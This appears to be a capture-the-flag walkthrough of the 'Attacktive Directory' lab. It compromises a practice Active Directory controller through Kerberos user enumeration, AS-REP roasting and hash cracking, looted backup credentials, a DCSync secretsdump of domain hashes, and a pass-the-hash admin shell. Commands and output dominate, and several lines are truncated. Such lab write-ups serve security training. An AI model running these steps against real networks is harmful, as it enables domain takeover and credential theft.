Attacktive Directory

export IP=10.10.192.109

Setup
Impacket requires python version >=3.7.
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install
Bloodhound Neo4j
sudo apt install bloodhound neo4j
Kerbrute: brute force discovery of users, passwords and even password spray!
https://github.com/ropnop/kerbrute/releases
EvilWinRM
https://github.com/Hackplayers/evil-winrm

Enum
nmap
root@ip-10-10-47-56:~/AttacktiveDir# nmap -sC -sV 10.10.192.109 -oN nmap.initial

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-25 17:09 BST

Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.83% done; ETC: 17:10 (0:00:15 remaining)
Nmap scan report for ip-10-10-192-109.eu-west-1.compute.internal (10.10.192.109)
Host is up (0.00041s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 16:10:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
445/tcp open microsoft-ds?

1
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-06-24T16:06:44
|_Not valid after: 2023-12-24T16:06:44
|_ssl-date: 2023-06-25T16:10:46+00:00; 0s from scanner time.
MAC Address: 02:52:FA:48:EB:61 (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:fa:48:e
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25 17:10:46
|_ start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/

Nmap done: 1 IP address (1 host up) scanned in 105.10 seconds
enum4linux
enum4linux 10.10.192.109

Abusing Kerberos
kerbrute
User list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-
tools/master/userlist.txt Password list: https://raw.githubusercontent.com/Sq00ky/attacktive-
directory-tools/master/passwordlist.txt > User and pass list is this room specific
normally brute force not recommended cuz of account lockout.
root@ip-10-10-47-56:~/AttacktiveDir# ./kerbrute_linux_amd64 userenum --dc 10.10.192.109 -d s

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/25/23 - Ronnie Flathers @ropnop

2
2023/06/25 17:39:47 > Using KDC(s):
2023/06/25 17:39:47 > 10.10.192.109:88

2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]

2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:48 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:49 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:50 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:51 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:55 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:57 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:05 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:09 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:10 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:16 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:20 > Done! Tested 73317 usernames (16 valid) in 33.641 seconds
We can attack with ASReproasting > ASReproasting occurs when a user
account has the privilege “Does not require Pre-Authentication” set. This means
that the account does not need to provide valid identification before requesting
a Kerberos Ticket on the specified user account.

Retrieving Kerberos Tickets GetNPUsers.py (located in impacket/examples/GetNPUsers.py)

> that will allow us to query ASReproastable accounts from the Key Dis-
tribution Center. > that’s necessary to query accounts is a valid set of
usernames
root@ip-10-10-47-56:~/AttacktiveDir# python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for svc-admin

[email protected]:5da54054107c7568f46b52473942dfa3$8c860941f70266326ca
We got ticket without pass.
hashcat
hashcat -m 18200 hash.txt passwordlist.txt

pass: management2005
-m 18200 Kerberos 5 AS-REP etype 23
smbclient

3
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin -L 10.10.192.109
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:

Sharename Type Comment

--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.192.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
smbclient
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin \\\\10.10.192.109\\backup
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020

8247551 blocks of size 4096. 3610988 blocks available

root@ip-10-10-47-56:~/AttacktiveDir# cat backup_credentials.txt

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

root@ip-10-10-47-56:~/AttacktiveDir# base64 -d backup_credentials.txt

[email protected]:backup2517860
We got backup pass.
Well, it is the backup account for the Domain Controller. This account has
a unique permission that allows all Active Directory changes to be synced
with this user account. This includes password hashes
Secretsdump
root@ip-10-10-47-56:~/AttacktiveDir# secretsdump.py -just-dc [email protected]

Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

4
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d709
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a64
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cf
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab4553
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:6ccefc4d4705491321ca8a24d7fd8ee5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
.
.
.
Administrators NTLM: 0e0363213e37b94221497260b0bcb4fc

Pass the Hash

root@ip-10-10-47-56:~/AttacktiveDir# evil-winrm -i 10.10.192.109 -u Administrator -H 0e03632

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

thm-ad\administrator